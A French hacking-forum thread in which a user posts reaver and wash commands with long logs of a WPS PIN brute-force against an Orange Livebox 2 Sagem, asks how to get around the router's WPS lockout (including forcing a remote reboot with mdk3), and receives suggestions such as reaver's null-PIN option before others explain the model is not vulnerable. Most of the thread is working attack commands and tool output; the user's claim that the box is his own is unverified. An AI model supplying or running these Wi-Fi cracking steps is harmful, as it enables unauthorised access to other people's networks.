Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-08-2017 13:59:49

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Script WPS LIVEBOX 2 Sagem

Bonjour a tous, je vais essayer expliquer mon cas en essayant d'etre clair.

Je posede une LIvebox 2 de sagem chez orange, jai teste le script REAVER en connaissant le PIN ca fonctionne.
--------------------------------------------------------------------------------------------------------------------------------------------------------------
wash -i wlan0mon

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
11:22:33:44:55:66      6            -36        1.0               No                Livebox-9359

!!J'ai bien sur teste avec une distance plus lointaine, j'arrive toujours a avoir le code.!!
  -------------------------------------------------------------------------------------
reaver -i wlan0mon -b 11:22:33:44:55:66  -c 6 -p 12345670
----------------------------------------------------------------------------------------

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from 00:19:70:99:93:10
[+] Associated with 11:22:33:44:55:66 (ESSID: Livebox-9359)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 12355670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f4:5e:17:0d:a6:58:41:7e:14:fc:98:d3:1e:96:cc:ef
[P] PKE: 9b:7d:a9:20:64:09:2f:6f:7d:c9:ea:94:24:dc:95:c1:b9:db:3c:e0:2a:6b:80:9e:4f:26:e5:30:a7:c1:38:ea:44:0e:6d:34:31:b3:fb:5f:88:8e:61:0e:d7:ba:76:ff:9c:2c:65:ad:70:b2:8d:01:37:f1:b6:85:17:aa:e0:f0:65:06:c5:5f:b1:3d:a6:f1:da:1f:39:60:21:1b:ef:a4:c5:3a:b0:32:5f:a7:3c:84:57:97:e8:20:a0:58:c7:bd:81:7f:b4:db:47:90:6a:ef:c2:9a:a6:16:e9:43:bc:e8:3e:6b:66:82:02:fb:48:ea:7b:19:ed:2c:58:7e:41:55:7d:56:c3:11:ed:0b:e6:d8:d8:28:94:d0:0d:41:42:74:df:01:53:37:c8:e5:2d:44:52:ed:5c:49:52:58:5e:12:b5:a7:3f:6a:57:9c:3e:09:1e:1c:a6:a2:15:be:89:06:26:bb:0c:c1:59:79:b6:d2:d4:2a:e5:7c:6d:5d:f1:43
[P] WPS Manufacturer: Sagem
[P] WPS Model Name: Livebox FTTH v2
[P] WPS Model Number: B.1.1.1
[P] Access Point Serial Number: AN13143FF
[+] Received M1 message
[P] R-Nonce: ff:d6:4b:a3:88:14:97:4a:e5:bc:9f:a1:ea:b6:d3:5b
[P] PKR: 61:20:a3:c8:9d:cf:42:68:a8:6d:55:58:b9:f2:d3:7d:df:80:b9:98:98:92:a5:a3:6b:3a:94:f2:32:61:40:a6:a7:88:72:7e:11:09:5e:3a:22:4a:6d:16:ae:cb:f2:74:53:82:18:23:c4:95:72:4c:0e:03:0c:0a:d7:b8:d4:b5:26:5d:a7:7f:65:54:2e:4a:16:d9:f1:3b:47:d3:32:b1:9e:30:45:33:24:ea:df:fd:8a:e9:dd:68:24:61:fe:eb:cd:7f:10:25:6e:ea:44:13:48:ec:b4:0a:66:b2:0f:dd:25:9f:23:e0:63:9d:d4:9a:77:8e:e4:07:51:49:c8:d2:4c:f1:52:12:c6:b1:97:d7:14:3e:de:2e:39:41:50:d0:ef:91:37:42:a2:54:d5:55:ce:d1:7c:95:b5:9e:40:3c:c2:ad:dd:db:63:1c:1c:98:f1:65:c7:ef:49:7c:d0:4d:f1:6f:2b:95:0d:f7:ce:13:bc:4f:ce:98:bf:02:6a:ed
[P] AuthKey: 7e:97:42:f0:65:28:0a:3e:40:96:cb:af:47:37:1b:3a:08:f8:f2:6b:be:e4:12:c0:bf:e4:0e:24:39:f3:78:bb
[+] Sending M2 message
[P] E-Hash1: 5a:61:b7:3c:0d:83:4b:be:1c:43:7e:6b:8c:2a:5e:1c:8b:b2:6f:fa:98:d2:19:7e:42:3c:d0:51:42:c7:d0:43
[P] E-Hash2: 02:8e:3c:1b:ff:3f:1e:9a:6c:c9:d0:23:48:d2:53:58:fb:56:24:64:6a:91:8b:45:72:c7:c6:41:b0:f8:ee:b6
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 5 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: '§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§§'
[+] AP SSID: 'Livebox-9359'
-------------------------------------------------------------------------------------------------------------------------------------------

!!!!J'ai remplacer WPS PIN ET WPA PSK!!!! pour vous montrer le recu.

Ceci a ete fais avec, bien sure la carte wifi ALFA AWSU036H sous le chipset rlt8187.

Bon maintenant j'ai voulu corse les choses en ne rentrant pas le PIN

------------------------------------------------------------------------------------------------------------------------------------------------------
reaver -i wlan0mon -b 00:19:70:99:93:10 -c 6 -vv -r 3:30 -t 10 -d 8 -x 600
---------------------------------------------------------------------------------------------------------

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire
----------------------------------------------------------------------------------------------------------------------------------------------------------
[+] Switching wlan0mon to channel 6
[?] Restore previous session for 11:22:33:44:55:66? [n/Y] n
[+] Waiting for beacon from 11:22:33:44:55:66
[+] Associated with 00:19:70:99:93:10 (ESSID: Livebox-9359)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 26:e0:11:1b:36:77:90:e2:ad:52:39:00:da:4c:e4:60
[P] PKE: a3:17:6b:d8:85:d1:f4:2d:fc:e5:70:cb:20:f8:d6:ec:60:aa:fe:10:cf:39:d9:99:f7:63:df:40:34:23:85:2c:ca:33:82:7d:b6:c3:17:c9:19:67:9e:18:86:af:d3:2e:4e:e9:cb:83:87:67:e3:b7:63:6f:8f:25:30:1c:3b:3a:8e:2c:78:7e:24:6f:90:13:76:9f:66:f1:d1:ba:a5:62:7e:49:89:a0:2d:26:11:df:a3:65:a2:a1:70:9f:2e:fd:cf:a0:94:5b:0e:18:a9:35:c0:8b:9a:44:85:d0:b7:5b:30:3c:d3:d4:7d:f7:4a:5d:f8:57:76:bf:64:46:13:f2:52:06:b9:8d:93:53:1a:63:e9:93:9e:76:3e:2d:7c:5c:42:14:75:1a:b2:0b:26:47:ea:06:6e:83:43:cf:5d:ce:18:21:b9:8a:a1:9b:77:d3:b4:eb:8a:4e:4c:86:3c:65:f4:7c:6f:74:70:22:36:a6:7e:a6:49:96:41:86:2a:04
[P] WPS Manufacturer: Sagem
[P] WPS Model Name: Livebox FTTH v2
[P] WPS Model Number: B.1.1.1
[P] Access Point Serial Number: AN13143FF
[+] Received M1 message
[P] R-Nonce: 09:b8:97:dc:86:dc:0b:3a:6e:f7:45:17:c2:79:76:5a
[P] PKR: a9:9e:b0:48:f3:6b:6d:48:86:09:d6:ed:fb:fe:13:b2:8c:14:9a:3e:5a:ba:f1:cc:9d:6c:99:14:70:6b:e6:36:b1:2e:e1:57:37:8e:55:b6:6c:a8:ce:4e:f4:77:c0:3d:a2:9f:06:85:26:b8:25:ec:62:29:87:cc:6e:0b:47:5c:7e:7c:41:ae:65:dd:86:e2:bc:1b:fb:64:8c:7c:52:72:0e:e5:87:95:63:93:bf:31:9b:4f:57:f0:fc:eb:b5:32:c0:b2:44:41:8f:b9:7e:79:12:21:71:64:3b:13:72:09:2b:f9:13:d1:d6:92:42:eb:bb:41:ba:77:e4:9e:bb:c7:ec:c5:c5:91:00:fa:47:0a:f8:79:8d:b8:45:bb:a1:7e:9d:55:a3:57:65:14:f1:be:57:81:ff:e0:b3:c3:c8:66:b1:f8:0d:36:8e:24:73:d9:3c:ad:22:e8:5d:d2:89:34:f0:e0:16:55:87:51:a9:a7:54:3d:b3:b5:9f:fb:98:f3
[P] AuthKey: 62:ce:59:bd:d6:db:55:93:fe:d8:70:28:22:f3:0f:3a:18:26:55:11:77:d8:4f:67:a6:65:ae:31:02:62:a5:5f
[+] Sending M2 message
[P] E-Hash1: 94:a2:45:c2:18:b6:00:3c:5f:45:0b:70:d1:5b:85:27:f1:3c:47:e9:a4:f9:00:61:b7:1c:2a:ad:52:21:5b:f9
[P] E-Hash2: b1:a6:0c:28:04:1c:6e:92:3f:d6:36:a0:e6:88:7c:21:b2:a6:2d:52:94:8d:0a:b9:29:a6:6d:b5:34:80:a1:93
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d5:27:08:bd:c0:5d:00:4a:82:de:19:1b:4a:6e:c9:7a
[P] PKE: 29:f7:77:e2:0c:95:cf:b4:d7:58:2c:f6:ee:fb:84:89:6f:74:06:fc:7a:f2:df:18:6d:7c:1e:80:bb:90:d0:7d:f5:9e:bb:30:7c:f6:9e:c6:ed:2c:1b:0c:78:d4:e4:9d:73:fe:73:4e:18:8e:0f:55:7f:0f:47:b9:64:b7:bc:cc:b8:48:e4:f8:ec:37:f2:36:db:29:59:22:b5:0e:32:f0:28:1f:bc:e8:68:a8:be:94:68:ec:cc:4b:d2:8e:a6:2f:af:82:21:82:d6:9b:b0:2b:41:29:4a:d3:45:dd:f9:a6:69:ed:04:0a:e7:c7:2d:74:17:e7:8c:ce:a5:9f:ca:31:8f:3f:7b:5e:01:61:15:1f:3b:bb:69:17:6c:92:6d:e7:7b:5b:48:16:b8:4d:f8:e5:c8:7b:42:51:bd:8e:e2:37:e1:fc:f1:31:76:97:56:08:5e:82:74:b8:ca:ce:16:57:6d:8b:bf:61:f9:9e:57:85:5e:e1:14:ef:65:d7:b1:5a
[P] WPS Manufacturer: Sagem
[P] WPS Model Name: Livebox FTTH v2
[P] WPS Model Number: B.1.1.1
[P] Access Point Serial Number: AN13143FF
[+] Received M1 message
[P] R-Nonce: 0f:c7:d1:4d:91:a0:06:05:82:49:fe:d1:e5:4b:cb:59
[P] PKR: 35:13:16:6a:cb:f0:65:65:e5:78:b8:25:49:70:b4:cd:75:84:0c:b0:cd:52:e1:c5:be:ea:a3:7c:40:33:28:99:15:a9:5c:ff:2f:7c:69:7f:a5:f2:ff:ca:6e:c7:e5:00:6d:a8:64:3f:d6:56:c7:e7:d5:55:84:74:74:97:a1:b8:f7:cf:7b:96:a9:be:e0:21:d7:ed:71:06:b0:d8:70:1c:e9:2a:2e:bb:17:15:85:34:08:58:ef:50:5b:a8:3b:42:26:61:b9:f2:9f:ed:83:77:62:98:8b:16:c1:41:91:af:8b:d2:91:b8:b8:e0:51:80:83:f3:90:dd:16:bf:80:0c:7a:89:13:6c:1c:e1:92:d7:a8:c0:d2:b9:1b:0d:d0:1a:07:33:47:9c:d8:bc:2f:77:9a:a7:25:ac:b8:c1:0b:55:03:50:be:cd:51:7b:c9:35:91:8d:02:a5:14:6f:03:b1:a4:d4:34:b5:d9:6a:50:b8:69:a5:48:ad:75:82:64:d0
[P] AuthKey: 87:c3:2c:f0:b3:7a:b8:b6:3f:b4:2e:7f:aa:c7:62:ce:68:14:b9:dc:aa:73:60:99:9c:42:8b:37:ad:93:52:c6
[+] Sending M2 message
[P] E-Hash1: 2d:60:b2:df:5b:cf:7c:a4:23:23:88:7d:fc:9c:51:a6:b0:17:17:49:5e:7b:64:ef:bc:37:50:9f:26:ae:97:7f
[P] E-Hash2: 7e:37:d9:c1:5a:65:cb:11:49:9d:17:72:96:ec:54:de:97:fb:22:be:ec:11:d5:ee:07:53:69:d2:01:63:92:56
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 36:62:34:58:1e:da:7b:a3:41:10:2b:37:c8:a0:2c:0b
[P] PKE: 42:e4:81:ac:02:7c:a5:75:35:09:bc:d5:65:d0:4f:54:13:2c:b4:08:61:ec:c8:fb:04:53:6a:7b:e2:79:94:c8:08:6c:72:27:a2:da:4c:03:d5:5b:04:f2:af:cc:42:a5:22:3c:23:6e:62:79:1f:26:d2:e0:12:65:cc:ad:fa:63:53:e5:20:d4:c1:f9:ee:18:58:63:60:e7:7d:d6:c9:88:4c:93:f2:13:a2:c4:a8:4d:00:97:86:8b:f2:e2:84:46:1d:01:e0:89:18:49:78:f3:63:b6:88:f4:1f:56:5e:b7:07:78:a5:f8:27:07:da:eb:6e:d5:fc:36:75:15:77:55:9b:1c:ac:82:84:a0:f2:3a:a5:0e:34:b6:40:f9:0f:ab:29:91:7c:22:f5:06:ac:28:4b:5e:e6:fd:86:30:05:77:df:98:44:8c:78:03:7a:c9:89:fd:3c:43:f5:83:26:23:20:68:3a:b7:e9:f7:da:09:43:07:43:54:b9:aa:1e:12
[P] WPS Manufacturer: Sagem
[P] WPS Model Name: Livebox FTTH v2
[P] WPS Model Number: B.1.1.1
[P] Access Point Serial Number: AN13143FF
[+] Received M1 message
[P] R-Nonce: d4:95:83:7c:16:ac:eb:3c:cd:48:c4:d9:01:b3:77:62
[P] PKR: 0d:9e:3c:94:5f:6c:c7:9d:11:71:64:1e:4f:0e:d9:0e:45:21:db:a8:3e:de:c9:da:70:26:b7:26:f1:f0:c7:9e:e7:98:95:0a:cf:34:1c:c3:40:db:3c:ee:06:d5:28:d8:4b:4a:f4:65:15:12:08:0a:7f:c3:30:0f:56:94:95:3f:64:fb:e1:67:7f:f1:83:74:84:fd:8d:8d:53:50:64:c0:ce:ca:56:87:a0:f6:ac:d5:ef:42:88:01:40:7c:d4:9b:18:7b:3e:41:20:c5:f1:43:c6:d3:ed:a7:0a:00:ca:97:4f:ff:a0:65:7e:45:5e:a0:3c:e9:25:b7:b5:8e:30:67:a2:f4:38:0b:02:d5:b8:9e:a7:f5:3c:2b:3a:ff:01:5c:c6:93:92:d5:e8:db:ec:98:10:48:bc:73:df:dc:0d:24:b3:91:39:56:36:87:6b:67:c2:10:bb:2e:4c:dc:53:39:14:2b:bb:e7:b7:c1:d0:ff:eb:1b:fe:be:08:62:0d:2a
[P] AuthKey: a9:92:44:5f:2e:59:e0:bb:aa:e3:9a:f2:3e:c2:1e:03:3b:3f:a4:ec:5a:76:63:93:3d:35:55:2f:59:8a:73:7a
[+] Sending M2 message
[P] E-Hash1: 9e:27:e4:21:37:4d:85:f7:a6:d3:78:cf:d6:8b:99:3b:a4:b6:2c:64:32:6d:0d:3f:e2:ed:bd:c1:46:b4:d5:7e
[P] E-Hash2: a7:e6:9e:c1:e6:15:6e:5a:59:c0:29:1d:a2:01:8f:8c:c6:90:80:5c:99:0c:c4:c4:29:17:e6:a7:67:3e:aa:0d
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 3
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Entering recurring delay of 30 seconds
[+] Trying pin 11115670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[!] EAP_FAILURE: TERMINATE
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking

J'ai reussi a monter de 3 PIN comme on le vois mais voila quelle se met en securite.
Donc jai fais la commande

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
11:22:33:44:55:66       6            -34        1.0               Yes               Livebox-9359

et on vois bien WPS Locked donc ces normal elle ce met en securite alors maintenant chere conpatriot du Hacking je vous demande conseille: esque je modifie ma commande meme si jai essayer avec d'autre propriete auparavent qui nont pas eu de succes.

Donc jai checher sur le net combien de temps la securite ce metter ya en qui dise 5min ya en qui dissant quil senleve au redemarage de la box donc j'ai effectuer ces 2 methode la premiere rien toujours locked yes meme en attendant une journee rien mais la deuxieme a marcher jai redemarer la box avec le bouton redemarer et jai remarquer que le Code PiN a changer donc et jai trouver un moyen de redermarer avec la commande mdk3 a -a (bssid) -c 6 a distance mais le pin change aussi.....

Voila pour la Premiere partie
----------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------
Ma deuxieme partie est impeu compliquer a expliquer mais bon je me lance.
--------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------
Au lieux de tester le PIN de la box avec reaver est-il possible qu'il est un moyen q'un script puisse demander a la box le mot de passe sans a avoir a apuyer sur le fameux bouton WPS en gros un bouton virtuel, il faudrais trouver le systeme qui enclanche lenvoie de ce code et construire ce script jai regarder sur le net mais pas de sujet a ce propos.
-------------------------------------------------------------------------------------------------------------------------------------------------
Merci a toi fille ou garcon pour les reponces que tu va m'appoter.
----------------------------------------------|
Tout conseille est bien venu.    |
                                         |
                                    |

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-08-2017 18:52:01

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 948

Re : Script WPS LIVEBOX 2 Sagem

Deniz a écrit :

Au lieux de tester le PIN de la box avec reaver est-il possible qu'il est un moyen q'un script puisse demander a la box le mot de passe sans a avoir a apuyer sur le fameux bouton WPS

Y'a vraiment des comiques sur terre !!

Hors Ligne

#3 25-08-2017 20:25:04

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

Salut a toi FAB955 essaye de t'expliquer au lieux de dire y'a vraiment des comique sur terre et voyons ensemble sur quoi suis-comique. Mais je pence appréhendé ta réponse sur la deuxième partir "ça serais trop beau et trop simple qun tel script puisse exister." Mais oubliou le coter impossible de la chose et atardon-nous sur le cotée système, la comprehention  des propriétés de la machine je voudrais simplement savoir si ça serai possible ces tout. Merci.

Et si ta des info pour la première partie je suis preneur.

Hors Ligne

#4 25-08-2017 21:58:10

e0f
Membre
Lieu : Deep down in your network
Inscription : 16-08-2017
Messages : 18

Re : Script WPS LIVEBOX 2 Sagem

Tu as quelle version de Reaver?

Hors Ligne

#5 25-08-2017 22:07:43

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

e0f a écrit :

Tu as quelle version de Reaver?

Salut version 1.5.2 je vient de faire un upgrade sur la version 1.6.1

Hors Ligne

#6 26-08-2017 01:37:34

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Script WPS LIVEBOX 2 Sagem

Deniz pense a utiliser la balise code <>  entre tes explications et tes logs c'est pas vraiment lisible de balancer des logs comme sa.

Hors Ligne

#7 26-08-2017 06:55:04

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

koala a écrit :

Deniz pense a utiliser la balise code <>  entre tes explications et tes logs c'est pas vraiment lisible de balancer des logs comme sa.

Tu as raison je suis nouveau sur le forum, je me suis pas familiariser avec les commandes je pence que je vais modifier mon texte. Merci

Hors Ligne

#8 26-08-2017 07:23:04

e0f
Membre
Lieu : Deep down in your network
Inscription : 16-08-2017
Messages : 18

Re : Script WPS LIVEBOX 2 Sagem

Maintenant que tu es en 1.6.1, essaies cela:

reaver -i tonInterface -b tonBSSID -p "" -c tonChannel -vv

Tu remarques l’argument « -c "" » « -p "" » qui permet de fournir un PIN null, vide.
Depuis la version 1.6.1, il est possible d’inserer un PIN null (vide); je t’invite à regarder ce topic:
http://www.crack-wifi.com/forum/topic-1 … -null.html

Dernière modification par e0f (26-08-2017 09:18:22)

Hors Ligne

#9 26-08-2017 09:16:31

Fab955
Membre Irremplaçable
Inscription : 14-11-2013
Messages : 948

Re : Script WPS LIVEBOX 2 Sagem

e0f a écrit :

Tu remarques l’argument « -c "" » qui permet de fournir un PIN null, vide

bigsmoke

C'est pas -p plutôt

wink

Hors Ligne

#10 26-08-2017 09:17:53

e0f
Membre
Lieu : Deep down in your network
Inscription : 16-08-2017
Messages : 18

Re : Script WPS LIVEBOX 2 Sagem

Ah oui exact! Haha, j'étais pas tout à fait réveillé, je corrige :p

Hors Ligne

#11 26-08-2017 13:05:41

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

Merci pour vos réponse je vais essayé vaut proposition cette aprem.

Hors Ligne

#12 26-08-2017 14:02:55

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

Fab955 a écrit :
e0f a écrit :

Tu remarques l’argument « -c "" » qui permet de fournir un PIN null, vide

bigsmoke

C'est pas -p plutôt

wink

Bon voila jai tester avec le pin nulle ça ne fonctionne pas..:/ d'autre solution ? Svp

Hors Ligne

#13 26-08-2017 14:05:10

e0f
Membre
Lieu : Deep down in your network
Inscription : 16-08-2017
Messages : 18

Re : Script WPS LIVEBOX 2 Sagem

Tu peux nous montrer les logs? smile

Hors Ligne

#14 26-08-2017 14:38:38

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

e0f a écrit :

Tu peux nous montrer les logs? smile

reaver -i wlan0mon -b 00:19:70:99:93:10 -p "" -c 6 -vv

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from 00:19:70:99:93:10
[+] Associated with 00:19:70:99:93:10 (ESSID: Livebox-9359)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

Voila jai effectuer un premier teste rien je ce passe jai meme des WPS transaction failed (code: 0x02), re-trying last pin jai effectuer ensuite un deuxieme test et la jai un resultat. Pas tres convaiquant mais bon ces deja ca.

[+] Switching wlan0mon to channel 6
[+] Waiting for beacon from 00:19:70:99:93:10
[+] Associated with 00:19:70:99:93:10 (ESSID: Livebox-9359)
[+] Trying pin ""
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Quitting after 1 crack attempts
[-] Failed to recover WPA key
  String pin was specified, nothing to save.

si vous avez dautre commande pour ameliorer la lisibilite des log et des explication dites les moi Merci.
PS svp dite moi comment ces balise faut les mettre sa peut paraitre idiot mais bon...:rolleyes:

Hors Ligne

#15 26-08-2017 14:43:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 540

Re : Script WPS LIVEBOX 2 Sagem

Deniz a écrit :

si vous avez dautre commande pour ameliorer la lisibilite des log et des explication dites les moi Merci.


La balise code au dessus du champs de ton texte mentionnée par ce symbole <> roll

Hors Ligne

#16 26-08-2017 15:54:29

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

Y'a -t-il une solution donc pour avec les log de la commande Pin null j'ai l'impression que ji suis presque vous trouve pas ?

Hors Ligne

#17 26-08-2017 18:20:55

e0f
Membre
Lieu : Deep down in your network
Inscription : 16-08-2017
Messages : 18

Re : Script WPS LIVEBOX 2 Sagem

Essaies plusieurs fois.
Entre temps, tu peux faire cette commande ?

wash -i tonInterface -c tonChannel -j

L’argument -j permet d’avoir une sortie en JSON avec un peu plus de détails sur les box environnantes.
Cela nous permettra d’obtenir le modèle exact de ta box et donc vérifier si elle est faillible à ce genre d’attaque (si ta configuration WPS est par défaut à l’état d’usine).

Hors Ligne

#18 26-08-2017 18:34:16

sklerder
Membre Actif
Inscription : 14-08-2017
Messages : 31

Re : Script WPS LIVEBOX 2 Sagem

Bonsoir.

L'OUI de cette Livebox est "00:19:70", correspond à une Livebox 2 Sagem, non vulnérable au "pin null".

Hors Ligne

#19 26-08-2017 20:09:54

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

e0f a écrit :

Essaies plusieurs fois.
Entre temps, tu peux faire cette commande ?

wash -i tonInterface -c tonChannel -j

L’argument -j permet d’avoir une sortie en JSON avec un peu plus de détails sur les box environnantes.
Cela nous permettra d’obtenir le modèle exact de ta box et donc vérifier si elle est faillible à ce genre d’attaque (si ta configuration WPS est par défaut à l’état d’usine).

Merci a toi donc jai fais la commande

<wash -i wlan0mon -c 6 -j>

<le log {"bssid" : "00:19:70:99:93:10", "essid" : "Livebox-9359", "channel" : 6, "rssi" : -32, "wps_version" : 16, "wps_state" : 2, "wps_locked" : 2, "wps_manufacturer" : "Sagem", "wps_model_name" : "Livebox FTTH v2", "wps_model_number" : "B.1.1.1", "wps_device_name" : "Livebox FTTH v2", "wps_serial" : "AN13143FF", "wps_uuid" : "00000000000010000000001970999310", "wps_response_type" : "03", "wps_primary_device_type" : "00060050f2040001", "wps_config_methods" : "010a", "wps_rf_bands" : "01", "dummy": 0}>

Donc jai quelque info donc si quelqun pouvais me dire quoi regarder ou si il ya une info qui dit quel nest pas vulnerable.:)

Hors Ligne

#20 26-08-2017 20:19:12

sklerder
Membre Actif
Inscription : 14-08-2017
Messages : 31

Re : Script WPS LIVEBOX 2 Sagem

Deniz a écrit :

../..

Donc jai quelque info donc si quelqun pouvais me dire quoi regarder ou si il ya une info qui dit quel nest pas vulnerable.:)

"bssid" : "00:19:70:XX:XX:XX"

Comme je l'ai dit dans mon message précédent mais en plus clair :
Le BSSID de cette box commence par "00:19:70", OUI d'une LB2 Sagem, réputée non vulnérable.

A priori, il n'y avait que les LiveBox 3 (Play) qui étaient vulnérables.


[HS]
Ce serait sympa de filtrer les données que tu publies, surtout si ce ne sont pas les données d'un de tes équipements.
[/HS]

Hors Ligne

#21 26-08-2017 20:26:19

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

sklerder a écrit :
Deniz a écrit :

../..

Donc jai quelque info donc si quelqun pouvais me dire quoi regarder ou si il ya une info qui dit quel nest pas vulnerable.:)

"bssid" : "00:19:70:XX:XX:XX"

Comme je l'ai dit dans mon message précédent mais en plus clair :
Le BSSID de cette box commence par "00:19:70", OUI d'une LB2 Sagem, réputée non vulnérable.

A priori, il n'y avait que les LiveBox 3 (Play) qui étaient vulnérables.


[HS]
Ce serait sympa de filtrer les données que tu publies, surtout si ce ne sont pas les données d'un de tes équipements.
[/HS]


Dacccord je voie merci peut tu juste m'explique ce que cest OUI je nais pas entendu parler de ça.
Et pour ce qui est des donnée qui est la ces écrit derrière ma box donc je nest pas divulgue une autre AP smile

Hors Ligne

#22 27-08-2017 00:07:04

sklerder
Membre Actif
Inscription : 14-08-2017
Messages : 31

Re : Script WPS LIVEBOX 2 Sagem

L'OUI, c'est l'identification du fabricant de carte Ethernet (et donc aussi Wi-Fi).
Cet identifiant est constitué par les trois premiers octets de l'adresse MAC de la carte réseau en cause (ou du BSSID de l'AP lorsqu'on parle d'un point d'accès Wi-Fi).
Pour plus d'informations, tu peux regarder déjà la page Organizationally_Unique_Identifiersur Wikipedia, et creuser en suivant les liens contenus dans celle-ci smile

Les OUI vulnérables à la faille WPS "pin null" ont été recensés dans la discussion 0day Crack Box SFR NB6V en deux secondes par PIN "NULL"

Concernant le masquage des informations, que ce soient les tiennes ou à plus forte raisons celles des autres, il est toujours prudent, sur un forum, de masquer ce qui est propre à un équipement, un usager, une personne.

Ainsi, pour ce que wash renvoie comme résultats, il me paraît prudent de "flouter" :
- "bssid", : Les trois derniers octets (comme je l'ai fait précédemment,)
- "essid" : Tout ce qui est spécifique à un AP (pour une LiveBox, tout ce qui suit "Livebox-")
- "wps_serial" : Les 5 derniers digits
- "wps_uuid" : Dans le doute, l'ensemble
- "wps_primary_device_type" : Dans le doute, l'ensemble

Dernière modification par sklerder (27-08-2017 00:07:49)

Hors Ligne

#23 27-08-2017 09:02:50

Deniz
Membre
Inscription : 21-08-2017
Messages : 11

Re : Script WPS LIVEBOX 2 Sagem

sklerder a écrit :

L'OUI, c'est l'identification du fabricant de carte Ethernet (et donc aussi Wi-Fi).
Cet identifiant est constitué par les trois premiers octets de l'adresse MAC de la carte réseau en cause (ou du BSSID de l'AP lorsqu'on parle d'un point d'accès Wi-Fi).
Pour plus d'informations, tu peux regarder déjà la page Organizationally_Unique_Identifiersur Wikipedia, et creuser en suivant les liens contenus dans celle-ci smile

